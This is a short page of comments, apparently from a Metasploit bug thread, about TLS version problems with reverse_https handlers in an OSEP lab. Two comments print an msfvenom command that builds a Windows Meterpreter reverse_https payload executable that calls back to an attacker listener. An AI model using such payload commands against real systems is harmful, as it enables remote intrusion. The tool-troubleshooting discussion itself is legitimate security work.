Artur Avetisyan

Results 4 comments of Artur Avetisyan

You can set the SSLVersion to TLS1.2 on both the handler and the dropper and it should work. Dropper: ```bash sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 SSLVERSION=TLS1.2 -f exe -o...

@adfoster-r7 - I have access to an OSEP machine with the mentioned issue and I am willing to help replicate the bug.

> > @adfoster-r7 I can work on getting you lab access if you want to test it on the current systems we have. > > That would be cool; in...

You can also add `SSLVERSION=TLS1.2` at the payload creation msfvenom command, and it should work. Example: ```bash sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 SSLVERSION=TLS1.2 -f exe -o staged.exe ```